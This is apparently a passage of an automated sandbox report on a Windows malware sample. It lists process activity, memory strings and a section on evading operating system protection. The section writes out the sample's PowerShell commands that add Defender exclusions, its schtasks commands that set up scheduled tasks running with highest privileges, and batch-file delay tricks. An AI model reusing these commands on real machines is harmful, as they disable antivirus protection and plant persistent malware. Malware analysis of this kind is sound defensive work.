Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SgrmBroker.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SgrmBroker.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SystemSettings.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SystemSettings.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File opened: C:\Users\user\AppData\Local
                              Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1849068731.0000000013271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: WinPerfcommon.exe, 00000000.00000002.1745526741.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1849068731.00000000131BA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: …","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: WinPerfcommon.exe, 00000000.00000002.1803559438.000000001BC59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\a
Source: w32tm.exe, 0000002E.00000002.1802501531.000002357C197000.00000004.00000020.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001B9C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process token adjusted: Debug
Source: C:\Recovery\SgrmBroker.exe | Process token adjusted: Debug
Source: C:\Recovery\SgrmBroker.exe | Process token adjusted: Debug
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Process token adjusted: Debug
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Process token adjusted: Debug
Source: C:\Recovery\SystemSettings.exe | Process token adjusted: Debug
Source: C:\Recovery\SystemSettings.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process token adjusted: Debug
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Users\user\Desktop\WinPerfcommon.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeQueries volume information: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
